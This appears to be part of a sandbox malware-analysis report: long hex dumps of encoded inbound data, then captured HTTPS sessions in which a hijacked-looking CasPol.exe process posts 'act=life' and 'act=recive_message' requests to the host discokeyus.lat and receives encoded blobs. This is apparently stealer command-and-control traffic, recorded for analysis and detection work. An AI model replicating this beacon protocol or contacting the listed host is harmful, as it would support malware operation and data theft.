80c966e8612f9dbba336e9c9ad498b06cdaff01f Expires: Sat, 21 Dec 2024 12:22:17 GMT Source-Age: 0
2024-12-21 12:17:17 UTC	1378	IN	Data Raw: 74 76 50 34 7d 7d 65 7d 7d 7d 7d 65 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 71 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 45 7d 7d 7d 7d 7d 34 46 55 47 34 7d 54 7d 4e 6e 69 42 47 7b 74 2f 30 48 76 7e 48 50 2d 59 7b 57 2d 4d 39 4e 2d 4d 66 54 69 7e 6e 48 42 4d 35 56 44 63 7b 49 3e 73 7b 59 44 77 34 47 3c 77 34 47 72 65 39 74 69 7e 31 56 3e 7e 75 55 6a 7d 7d 7d 75 65 75 7d 7d 65 57 7b 7b 7d 64 72 70 66 39 4e 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 64 47 7d 7d 69 7b 63 57 65 6f 7d 7d 64 53 7d 57 7d 7d 52 7d 7d 7d 7d 7d 7d 7d 7d 66 63 69 7d 7d 7d 7d 65 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 71 7d 7d 7d 65 7d 7d 7d 7d 7d 69 7d 7d 7d 7c 7d 7d 7d 7d 7d 7d 7d 7d Data Ascii: tvP4}}e}}}}e}}}}}}}}}}}}}}}}}}}}q}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}E}}}}}4FUG4}T}NniBG{t/0Hv~HP-Y{W-M9N-MfTi~nHBM5VDc{I>s{YDw4G<w4Gre9ti~1V>~uUj}}}ueu}}eW{{}drpf9N}}}}}}}}}}dG}}i{cWeo}}dS}W}}R}}}}}}}}fci}}}}e}}}}}}}}}}}q}}}e}}}}}i}}}\|}}}}}}}}
2024-12-21 12:17:17 UTC	1378	IN	Data Raw: 4a 56 44 72 6f 7d 45 7d 7e 37 44 71 32 7d 45 7d 6b 40 44 71 45 64 57 7d 6f 6a 72 63 71 65 4a 75 71 4b 7b 7e 4f 7d 75 6f 47 75 7d 7d 7d 7d 47 38 71 69 57 5a 68 7d 57 38 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 58 76 75 31 44 77 47 21 57 4f 49 33 57 4b 71 64 68 42 47 46 38 7d 63 7d 7d 7d 64 34 46 7e 7b 47 7d 7d 49 33 71 4b 70 69 53 55 64 37 3e 44 7d 66 70 4f 48 33 69 7d 7d 69 70 65 7b 69 78 7d 44 63 76 66 4b 6a 63 71 4b 6a 63 71 4b 6a 63 71 4b 6a 63 71 4b 6a 63 71 49 73 34 70 54 4c 30 7d 75 21 48 4b 2d 47 7d 7d 47 38 71 65 72 7c 78 7d 44 45 58 6e 64 37 42 64 47 38 64 45 47 40 48 3e 64 34 46 4b 7d 7d 7d 7d 2f 44 56 40 6a 69 76 75 7b 75 71 7d 36 6c 35 31 7d 7d 64 68 7d 7d 7d 7d 7d 7d 63 6e 72 63 71 4b 75 70 38 32 36 65 58 59 7d 7d 63 64 58 7d 4a 44 68 Data Ascii: JVDro}E}~7Dq2}E}k@DqEdW}ojrcqeJuqK{~O}uoGu}}}}G8qiWZh}W8Z/Z/Z/Z/Z/Z/Z/Z/Xvu1DwG!WOI3WKqdhBGF8}c}}}d4F~{G}}I3qKpiSUd7>D}fpOH3i}}ipe{ix}DcvfKjcqKjcqKjcqKjcqKjcqIs4pTL0}u!HK-G}}G8qer\|x}DEXnd7BdG8dEG@H>d4FK}}}}/DV@jivu{uq}6l51}}dh}}}}}}cnrcqKup826eXY}}cdX}JDh
2024-12-21 12:17:17 UTC	1378	IN	Data Raw: 7d 7d 64 68 71 7d 57 7d 7d 7d 7d 7d 58 30 7d 69 7d 7d 7d 7d 7d 69 4c 7b 63 69 53 55 47 68 30 7d 77 57 21 66 49 7d 2f 7d 7d 69 53 2f 6a 69 6e 35 7b 7d 76 30 7d 4a 68 7d 49 75 71 4b 63 65 44 66 49 73 34 70 54 4c 30 7d 75 21 49 48 42 47 7d 7d 47 38 71 65 72 7c 78 7d 44 45 59 7d 21 31 30 70 48 77 53 7b 7d 7d 63 6a 6c 4f 53 2d 6a 6f 4d 31 7d 47 7d 7d 47 38 75 65 49 73 35 51 65 70 38 76 7b 64 7b 65 7d 69 70 65 7b 69 78 7d 64 34 73 44 7d 47 7d 7d 55 71 65 7d 7d 7d 63 6a 57 38 2d 7d 7d 7d 7d 7d 7d 2f 44 7d 7b 7d 7c 7d 7d 7d 63 6a 73 7d 4a 50 47 71 69 7d 7d 69 4e 68 49 31 57 4b 7e 66 64 4f 4c 4d 30 7d 7d 69 70 65 7b 64 4e 64 64 34 77 32 7d 47 7d 7d 49 58 34 70 54 49 54 76 36 64 7b 55 7d 7d 63 64 58 7d 73 66 57 68 71 3e 71 34 4b 45 64 37 7c 52 76 45 47 44 42 47 7d Data Ascii: }}dhq}W}}}}}X0}i}}}}}iL{ciSUGh0}wW!fI}/}}iS/jin5{}v0}Jh}IuqKceDfIs4pTL0}u!IHBG}}G8qer\|x}DEY}!10pHwS{}}cjlOS-joM1}G}}G8ueIs5Qep8v{d{e}ipe{ix}d4sD}G}}Uqe}}}cjW8-}}}}}}/D}{}\|}}}cjs}JPGqi}}iNhI1WK~fdOLM0}}ipe{dNdd4w2}G}}IX4pTITv6d{U}}cdX}sfWhq>q4KEd7\|RvEGDBG}
2024-12-21 12:17:17 UTC	1378	IN	Data Raw: 71 4b 7b 69 4b 75 6a 6f 53 71 4b 6a 63 71 4b 6a 63 71 4b 6a 63 71 4b 6a 63 71 72 75 35 30 32 69 4e 4f 69 30 71 4b 63 69 54 38 6a 7d 73 6c 70 69 45 64 40 40 39 30 58 4f 54 7b 63 64 4b 75 55 68 78 49 49 30 65 2f 49 58 59 34 75 21 4a 4d 3c 71 7d 7d 49 31 71 4b 7b 69 54 2f 6a 63 73 64 58 7d 71 37 72 63 71 4f 44 2d 78 40 44 63 71 4f 75 40 39 30 6a 63 5a 4f 35 32 4b 7d 7d 69 54 75 6a 7d 59 6c 74 63 71 53 47 38 71 2f 48 2d 7b 31 51 69 54 7b 65 69 53 65 55 6f 4c 37 40 40 40 40 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 5a 66 76 74 76 31 3c 64 37 7b 7d 58 40 34 6e 38 6a 63 71 7d 64 34 74 7d 7d 7d 7d 7d 49 33 71 4b 6b 69 78 32 64 34 73 30 7d 7d 7d 7d 76 55 48 36 3c 71 7d 7d 47 38 71 65 49 75 71 4b 7b 66 7b 77 36 2f 57 6a 7d 7d 63 6c 74 63 71 53 47 38 71 69 49 Data Ascii: qK{iKujoSqKjcqKjcqKjcqKjcqru502iNOi0qKciT8j}slpiEd@@90XOT{cdKuUhxII0e/IXY4u!JM<q}}I1qK{iT/jcsdX}q7rcqOD-x@DcqOu@90jcZO52K}}iTuj}YltcqSG8q/H-{1QiT{eiSeUoL7@@@@Z/Z/Z/Z/Z/Z/Z/Z/Zfvtv1<d7{}X@4n8jcq}d4t}}}}}I3qKkix2d4s0}}}}vUH6<q}}G8qeIuqK{f{w6/Wj}}cltcqSG8qiI
2024-12-21 12:17:17 UTC	1378	IN	Data Raw: 69 30 71 4b 64 69 54 38 6a 7d 49 6c 68 69 45 64 21 40 39 30 78 69 54 7b 63 64 4b 75 4d 68 78 49 49 30 65 2f 49 5a 59 7c 76 21 4a 32 3e 71 7d 7d 49 31 71 4b 7b 69 54 2f 6a 63 49 64 58 7d 71 37 72 63 71 65 44 2d 78 40 44 63 71 65 76 40 39 30 6a 64 64 4f 39 32 75 7d 7d 69 54 75 6a 7d 59 6c 74 63 71 57 47 38 71 2f 48 2d 7b 31 51 69 54 7b 65 69 53 65 4d 69 78 7d 44 7b 63 64 45 7d 71 7e 56 40 40 40 40 40 39 31 63 4f 54 34 63 6f 53 66 56 40 40 40 40 40 21 6a 21 69 70 65 65 66 35 46 77 31 33 64 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 76 76 6e 78 76 4f 70 53 7e 69 54 38 6a 64 63 6c 42 63 71 53 3c 49 35 78 36 6f 4c 4c 7d 7d 63 64 58 7d 49 66 57 68 72 7e 49 2d 42 52 69 50 63 71 4b 6a 63 71 4b 6a 63 71 4b 6a 63 71 4b 6a 63 71 49 46 44 68 3c 49 35 Data Ascii: i0qKdiT8j}IlhiEd!@90xiT{cdKuMhxII0e/IZY\|v!J2>q}}I1qK{iT/jcIdX}q7rcqeD-x@Dcqev@90jddO92u}}iTuj}YltcqWG8q/H-{1QiT{eiSeMix}D{cdE}q~V@@@@@91cOT4coSfV@@@@@!j!ipeef5Fw13dZ/Z/Z/Z/Z/Z/Z/Z/Z/Z/vvnxvOpS~iT8jdclBcqS<I5x6oLL}}cdX}IfWhr~I-BRiPcqKjcqKjcqKjcqKjcqIFDh<I5
2024-12-21 12:17:17 UTC	1378	IN	Data Raw: 74 40 44 48 64 40 66 71 7d 57 72 7d 63 64 58 7d 74 40 44 48 74 40 66 71 7d 57 72 7d 63 64 58 7d 74 40 44 47 4a 40 66 71 7d 57 72 7d 63 64 58 7d 74 68 72 48 71 7d 7d 7d 7d 7d 58 30 7c 71 7d 7d 7d 7d 7d 2f 44 7e 64 7d 7d 7d 7d 7d 64 68 72 47 47 7d 7d 7d 7d 7d 58 30 7c 65 7d 7d 7d 7d 7d 6f 53 33 49 33 7d 69 47 33 34 69 7d 68 71 49 2f 46 21 71 4b 6a 63 71 4b 6a 63 71 4b 6a 63 71 4b 6a 63 6c 72 47 74 40 6e 6c 4a 4f 7b 46 40 40 40 34 70 65 7b 65 2d 37 46 47 48 59 37 70 39 32 7b 70 38 76 7d 64 7b 65 7d 69 70 65 7b 66 42 52 7d 40 39 57 63 70 38 76 7d 64 7b 65 7d 69 70 65 7b 66 35 46 40 59 75 7d 2f 65 71 7d 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 76 76 6e 78 76 4f 70 53 65 6c 4a 40 40 40 40 40 47 33 57 4b 6a 7d 7d 70 48 6e 2f 7d 7d 7d 63 64 46 63 71 4f 7d 7d 21 65 59 Data Ascii: t@DHd@fq}Wr}cdX}t@DHt@fq}Wr}cdX}t@DGJ@fq}Wr}cdX}thrHq}}}}}X0\|q}}}}}/D~d}}}}}dhrGG}}}}}X0\|e}}}}}oS3I3}iG34i}hqI/F!qKjcqKjcqKjcqKjclrGt@nlJO{F@@@4pe{e-7FGHY7p92{p8v}d{e}ipe{fBR}@9Wcp8v}d{e}ipe{f5F@Yu}/eq}Z/Z/Z/Z/Z/Z/vvnxvOpSelJ@@@@@G3WKj}}pHn/}}}cdFcqO}}!eY
2024-12-21 12:17:17 UTC	1378	IN	Data Raw: 73 68 78 30 48 45 31 30 73 7c 54 31 7d 6f 54 7e 76 56 38 76 7d 64 7b 65 7d 69 70 65 7b 66 46 40 66 71 7d 57 72 7d 63 64 58 7d 74 40 44 63 71 65 40 58 75 7d 2f 65 71 7d 47 38 71 65 40 5a 71 4b 40 58 75 7d 2f 65 71 7d 47 38 71 65 76 46 38 76 7d 64 7b 65 7d 69 70 65 7b 6c 4a 40 40 40 40 40 47 38 71 30 78 4c 39 42 78 2d 2f 58 39 4f 4c 30 6a 7d 49 64 46 72 47 7d 44 64 65 58 32 35 63 71 4b 6a 63 71 4b 6a 63 71 4b 69 54 66 64 69 54 6e 65 69 53 38 4d 76 46 40 6e 6a 49 6e 72 63 71 71 75 6f 47 3e 40 70 40 40 47 38 71 2f 48 2d 7b 31 42 7c 4b 33 71 5a 54 44 7e 68 6c 3c 58 30 75 7c 7d 7d 7d 7d 7d 2f 44 66 68 7d 7d 7d 7d 7d 64 68 72 73 7d 7d 7d 7d 7d 7d 40 33 75 65 40 58 75 7d 2f 65 71 7d 47 38 71 65 40 33 75 2f 40 58 75 7d 2f 65 71 7d 47 38 71 65 40 33 75 71 40 58 75 Data Ascii: shx0HE10s\|T1}oT~vV8v}d{e}ipe{fF@fq}Wr}cdX}t@Dcqe@Xu}/eq}G8qe@ZqK@Xu}/eq}G8qevF8v}d{e}ipe{lJ@@@@@G8q0xL9Bx-/X9OL0j}IdFrG}DdeX25cqKjcqKjcqKiTfdiTneiS8MvF@njInrcqquoG>@p@@G8q/H-{1B\|K3qZTD~hl<X0u\|}}}}}/Dfh}}}}}dhrs}}}}}}@3ue@Xu}/eq}G8qe@3u/@Xu}/eq}G8qe@3uq@Xu
2024-12-21 12:17:17 UTC	1378	IN	Data Raw: 71 58 57 69 70 65 7e 66 35 46 77 31 33 64 5a 2f 5a 2f 76 76 6e 78 76 4f 54 30 6a 7b 71 70 56 47 36 40 40 40 40 40 40 34 78 6a 64 34 71 42 7d 71 7d 7d 64 37 35 77 7d 7c 78 73 64 34 71 70 7d 71 7d 7d 64 37 35 7e 7d 4f 78 7d 64 34 71 64 7d 71 7d 7d 64 37 35 32 7d 34 78 32 64 34 74 33 7d 7d 7d 7d 49 2d 55 7d 57 39 63 7d 21 57 4c 33 7b 7c 70 7b 30 6f 53 4a 49 2d 55 7d 57 35 21 7d 21 57 76 33 7b 7c 70 7b 51 45 53 75 49 2d 55 7d 57 37 21 7d 21 57 3e 59 7b 37 4e 40 40 40 40 40 36 57 6f 64 57 2d 4d 6a 30 34 64 64 30 69 64 37 63 78 2d 66 47 38 6c 71 36 59 6f 6a 30 34 64 64 4e 34 64 37 7b 78 2d 66 47 38 6b 50 36 58 73 6a 30 34 64 64 56 34 64 37 7b 4e 69 68 55 56 40 40 40 40 40 52 7d 34 70 63 59 7c 4e 64 47 2f 70 71 47 70 53 6a 44 57 77 64 57 6e 64 52 69 34 4e 64 47 Data Ascii: qXWipe~f5Fw13dZ/Z/vvnxvOT0j{qpVG6@@@@@@4xjd4qB}q}}d75w}\|xsd4qp}q}}d75~}Ox}d4qd}q}}d752}4x2d4t3}}}}I-U}W9c}!WL3{\|p{0oSJI-U}W5!}!Wv3{\|p{QESuI-U}W7!}!W>Y{7N@@@@@6WodW-Mj04dd0id7cx-fG8lq6Yoj04ddN4d7{x-fG8kP6Xsj04ddV4d7{NihUV@@@@@R}4pcY\|NdG/pqGpSjDWwdWndRi4NdG
2024-12-21 12:17:17 UTC	1378	IN	Data Raw: 40 33 78 72 39 39 64 52 7d 4a 68 7d 78 4c 40 64 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 59 6c 72 63 71 2f 64 36 39 65 6a 7d 48 71 36 6c 66 74 7d 7d 63 64 58 7d 74 64 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 5a 70 39 30 6a 7d 4a 4f 50 31 2f 7d 7d 69 70 65 7b 2f 70 2f 5a 2f 58 77 49 30 57 4b 65 69 54 65 6a 7b 73 6a 58 47 4e 6f 49 2d 69 48 59 47 21 56 31 4f 4e 6f 39 39 7c 48 58 56 46 71 69 2d 47 70 52 38 7c 7b 30 66 64 40 44 63 71 71 36 69 6e 74 7d 7d 63 64 58 7d 48 45 57 38 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 5a 2f 76 76 6e 78 76 4f 54 2f 6a 63 73 6c 72 63 71 2d 49 33 71 4b 66 69 78 32 44 63 3c 6c 78 63 71 4f 49 31 71 4b 69 69 54 38 6a 7b 49 6a 46 4e 63 6a 72 4e 49 6a 76 4e 73 6a 74 4e 59 6a 56 4f 71 7d 7d 7d 63 66 57 68 71 46 49 59 4a 52 68 7c 78 Data Ascii: @3xr99dR}Jh}xL@dZ/Z/Z/Z/Z/Ylrcq/d69ej}Hq6lft}}cdX}tdZ/Z/Z/Z/Z/Z/Z/Z/Zp90j}JOP1/}}ipe{/p/Z/XwI0WKeiTej{sjXGNoI-iHYG!V1ONo99\|HXVFqi-GpR8\|{0fd@Dcqq6int}}cdX}HEW8Z/Z/Z/Z/Z/Z/Z/Z/Z/vvnxvOT/jcslrcq-I3qKfix2Dc<lxcqOI1qKiiT8j{IjFNcjrNIjvNsjtNYjVOq}}}cfWhqFIYJRh\|x
2024-12-21 12:17:17 UTC	1378	IN	Data Raw: 71 52 73 4f 68 49 40 33 38 7d 7d 7d 21 32 4c 7b 3c 71 7d 7d 7d 7d 6b 78 57 4b 64 7d 68 46 49 78 34 47 49 33 71 4b 7b 64 54 30 6a 7b 7d 70 48 6a 71 7d 7d 7d 63 6a 46 63 71 69 7d 44 33 7b 34 71 75 58 30 7c 54 30 6a 66 73 6c 76 63 71 65 36 30 45 71 4b 6a 63 71 4b 6a 63 71 4b 6a 63 71 4b 6a 63 71 4b 7d 21 32 30 53 68 48 7b 7c 68 48 34 68 38 7d 7d 64 68 72 64 37 45 75 74 4e 6b 73 7d 47 63 6a 58 34 68 4e 40 33 38 7d 7d 7e 3c 6a 4c 68 35 59 4b 47 65 7d 49 44 50 63 3e 4f 4d 65 74 4e 6b 73 7d 47 7b 66 71 64 54 75 6a 7b 7b 30 6a 34 68 4c 40 33 38 7d 7d 69 4e 74 64 37 7c 73 49 6a 71 55 4b 7d 7d 7d 7d 69 68 39 7d 7d 65 7d 7d 68 45 54 49 6a 71 55 4b 69 7d 7d 7d 6f 55 4b 4b 6a 63 71 4b 69 54 2d 6a 7d 49 6c 76 63 71 71 49 30 57 4b 7e 6f 4c 40 7d 71 7d 7d 49 46 55 6c 76 Data Ascii: qRsOhI@38}}}!2L{<q}}}}kxWKd}hFIx4GI3qK{dT0j{}pHjq}}}cjFcqi}D3{4quX0\|T0jfslvcqe60EqKjcqKjcqKjcqKjcqK}!20ShH{\|hH4h8}}dhrd7EutNks}GcjX4hN@38}}~<jLh5YKGe}IDPc>OMetNks}G{fqdTuj{{0j4hL@38}}iNtd7\|sIjqUK}}}}ih9}}e}}hETIjqUKi}}}oUKKjcqKiT-j}IlvcqqI0WK~oL@}q}}IFUlv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49709	172.67.197.170	443	7404	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 12:17:22 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: discokeyus.lat
2024-12-21 12:17:22 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-21 12:17:23 UTC	1128	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 12:17:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tpq5oifai4u2t8it77a6002dl9; expires=Wed, 16 Apr 2025 06:04:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zf5zib7jysIgQmIzEoIn%2B27m08QaaNyDXM2UU7kPXM2IPhAWWz76L0DeasdDebJuM78d8E88ez3Xfb63irg5RbvNtCW4E1tE%2BuUx79%2FiO0ZXP37O78dCjHmYL7vEyhzo%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57cf04396ac46d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1605&rtt_var=612&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=905&delivery_rate=1772920&cwnd=248&unsent_bytes=0&cid=db2eea00ee07d976&ts=1496&x=0"
2024-12-21 12:17:23 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-21 12:17:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49715	172.67.197.170	443	7404	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 12:17:24 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 48 Host: discokeyus.lat
2024-12-21 12:17:24 UTC	48	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4f 50 43 4e 32 4d 2d 2d 53 65 72 67 65 69 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=OPCN2M--Sergei&j=
2024-12-21 12:17:25 UTC	1125	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 12:17:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jq00oc2lrpr4s3kiaj2lhd1ctg; expires=Wed, 16 Apr 2025 06:04:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ziYu08OR8cA8zhHDnjtrISJN2NcnD%2FOc8UGEwRjAjHZp8jqOvT8d1Cu630cNDHvTix7Ixd3PFMZBwLuvEF9g4zy6IpANjCcMOz%2BrrbdfGJRLGPRRiCkJ6Du%2FbwIVI9kfwQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57cf136d90c326-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1468&min_rtt=1468&rtt_var=552&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=946&delivery_rate=1979661&cwnd=239&unsent_bytes=0&cid=dde682c1915d82ac&ts=778&x=0"
2024-12-21 12:17:25 UTC	244	IN	Data Raw: 32 64 31 36 0d 0a 69 2f 6c 69 5a 35 79 6e 43 2f 50 6f 74 36 33 79 59 73 67 31 79 42 72 6d 59 42 4e 38 6f 67 36 67 66 47 31 4f 30 30 52 74 31 4c 66 77 32 78 52 46 70 70 4d 6e 30 5a 76 53 6a 38 67 57 75 6b 43 74 4e 73 51 42 64 31 36 59 61 4d 45 51 48 69 76 2f 5a 68 75 35 6c 62 47 66 41 77 76 76 77 69 66 52 6a 63 2b 50 79 44 6d 7a 46 36 31 30 78 46 6f 78 47 63 68 73 77 52 41 50 4c 37 67 72 48 62 6a 55 34 35 55 46 44 2f 6e 45 62 35 4b 45 32 73 69 58 42 36 6c 66 70 6e 4f 4c 43 48 35 65 6a 69 7a 46 42 6b 39 30 38 51 6b 49 6f 4e 62 47 6d 42 45 4d 76 74 6f 6e 69 4d 72 53 77 39 42 59 36 6c 53 74 65 49 6f 47 64 78 66 4b 5a 73 67 59 44 69 71 35 4e 41 53 79 33 2b 4f 62 42 67 37 7a 7a 58 75 66 6a 74 33 44 6b 51 32 70 46 2b 51 34 67 78 Data Ascii: 2d16i/liZ5ynC/Pot63yYsg1yBrmYBN8og6gfG1O00Rt1Lfw2xRFppMn0ZvSj8gWukCtNsQBd16YaMEQHiv/Zhu5lbGfAwvvwifRjc+PyDmzF610xFoxGchswRAPL7grHbjU45UFD/nEb5KE2siXB6lfpnOLCH5ejizFBk908QkIoNbGmBEMvtoniMrSw9BY6lSteIoGdxfKZsgYDiq5NASy3+ObBg7zzXufjt3DkQ2pF+Q4gx
2024-12-21 12:17:25 UTC	1369	IN	Data Raw: 6f 78 52 6f 41 2f 38 42 30 65 50 61 51 72 48 37 43 56 39 74 55 5a 52 66 6e 4a 4b 63 6e 4b 33 63 4f 65 42 61 6c 59 72 58 6d 45 45 48 34 65 77 32 54 4b 47 67 55 6a 76 69 6b 42 76 4e 4c 68 6b 67 63 4b 2b 63 31 76 6e 6f 6d 56 67 64 41 48 73 68 66 79 4f 4b 51 53 63 68 33 55 59 64 4e 65 45 47 4b 6f 5a 67 69 36 6c 62 48 62 42 67 76 2f 79 47 6d 44 67 74 37 45 6c 52 4b 68 58 71 64 31 68 41 39 37 45 63 4e 73 78 52 51 46 49 37 73 69 41 72 76 54 36 5a 74 41 53 37 37 43 63 64 48 53 6c 65 79 56 45 4b 31 62 76 44 71 2b 51 6d 35 51 32 53 7a 46 45 6b 39 30 38 53 34 4b 74 64 62 69 6c 41 4d 4e 39 64 64 70 67 34 7a 59 79 6f 49 47 72 31 6d 67 65 35 59 49 66 78 6a 44 5a 63 6b 58 43 69 75 31 5a 6b 48 32 30 76 48 62 57 45 58 66 79 47 4b 64 67 4d 4c 50 30 42 2f 6b 54 75 70 2f 69 Data Ascii: oxRoA/8B0ePaQrH7CV9tUZRfnJKcnK3cOeBalYrXmEEH4ew2TKGgUjvikBvNLhkgcK+c1vnomVgdAHshfyOKQSch3UYdNeEGKoZgi6lbHbBgv/yGmDgt7ElRKhXqd1hA97EcNsxRQFI7siArvT6ZtAS77CcdHSleyVEK1bvDq+Qm5Q2SzFEk908S4KtdbilAMN9ddpg4zYyoIGr1mge5YIfxjDZckXCiu1ZkH20vHbWEXfyGKdgMLP0B/kTup/i
2024-12-21 12:17:25 UTC	1369	IN	Data Raw: 50 59 63 35 65 51 57 79 32 50 6b 2f 75 6c 63 4f 59 46 41 62 30 68 31 79 53 68 4e 76 49 68 6b 43 31 47 62 4d 34 67 77 34 78 52 6f 42 68 77 78 59 4a 50 72 34 72 44 4c 6a 62 35 70 34 50 44 66 37 46 5a 4a 53 4f 33 73 53 54 44 61 35 46 6f 48 69 4d 42 33 41 55 79 69 79 4d 58 67 67 30 38 58 35 50 68 38 4c 69 32 54 55 47 38 4d 74 75 68 38 72 4b 67 59 6c 41 72 56 76 71 49 4d 51 50 65 52 76 46 59 38 4d 55 41 53 6d 37 4b 67 65 34 31 76 75 55 42 41 58 79 7a 57 4f 63 68 4e 48 48 6d 51 75 68 55 61 70 35 6a 6b 49 2f 58 73 64 30 67 6b 5a 50 47 4c 59 71 41 72 6d 58 33 4a 67 4f 43 2f 6e 54 4b 59 37 45 7a 49 2b 58 44 4f 6f 50 36 6e 53 4e 41 6e 6f 55 78 47 7a 46 45 77 6f 76 74 69 55 43 73 64 2f 6e 6e 41 51 4a 39 38 68 76 6b 59 33 52 79 6f 49 46 6f 31 75 6d 4f 4d 70 43 64 67 Data Ascii: PYc5eQWy2Pk/ulcOYFAb0h1yShNvIhkC1GbM4gw4xRoBhwxYJPr4rDLjb5p4PDf7FZJSO3sSTDa5FoHiMB3AUyiyMXgg08X5Ph8Li2TUG8Mtuh8rKgYlArVvqIMQPeRvFY8MUASm7Kge41vuUBAXyzWOchNHHmQuhUap5jkI/Xsd0gkZPGLYqArmX3JgOC/nTKY7EzI+XDOoP6nSNAnoUxGzFEwovtiUCsd/nnAQJ98hvkY3RyoIFo1umOMpCdg
2024-12-21 12:17:25 UTC	1369	IN	Data Raw: 58 67 67 67 38 58 35 50 76 39 7a 37 6c 51 34 4d 38 38 4e 68 6c 6f 54 59 78 4a 59 4c 72 56 43 73 64 59 77 50 64 42 33 42 61 4d 67 4d 44 43 65 37 4b 77 58 32 6d 36 6d 63 47 45 57 6d 68 55 36 64 6f 38 58 55 67 68 62 71 53 4f 52 68 78 41 56 39 58 70 67 73 77 52 45 47 49 37 6b 75 41 4c 6e 52 35 35 30 47 43 50 76 4b 59 34 4f 43 32 38 4b 62 44 36 46 46 71 6e 57 41 44 6e 55 57 79 32 61 43 55 45 38 72 71 57 5a 58 39 75 44 6b 6c 41 41 47 36 49 56 32 33 35 4f 56 79 4a 78 41 38 68 65 6d 64 6f 51 4e 66 52 4c 4c 5a 4d 4d 53 41 53 75 30 4c 77 65 2b 78 2b 69 66 43 41 54 77 79 6d 69 56 6a 39 44 4c 6c 77 53 73 57 4f 6f 32 78 41 56 70 58 70 67 73 37 54 6b 36 62 70 41 63 54 36 6d 62 38 4e 73 48 43 62 36 64 4b 5a 32 4a 32 63 65 66 42 71 4e 62 6f 48 47 50 44 6e 6f 61 7a 47 58 Data Ascii: Xggg8X5Pv9z7lQ4M88NhloTYxJYLrVCsdYwPdB3BaMgMDCe7KwX2m6mcGEWmhU6do8XUghbqSORhxAV9XpgswREGI7kuALnR550GCPvKY4OC28KbD6FFqnWADnUWy2aCUE8rqWZX9uDklAAG6IV235OVyJxA8hemdoQNfRLLZMMSASu0Lwe+x+ifCATwymiVj9DLlwSsWOo2xAVpXpgs7Tk6bpAcT6mb8NsHCb6dKZ2J2cefBqNboHGPDnoazGX
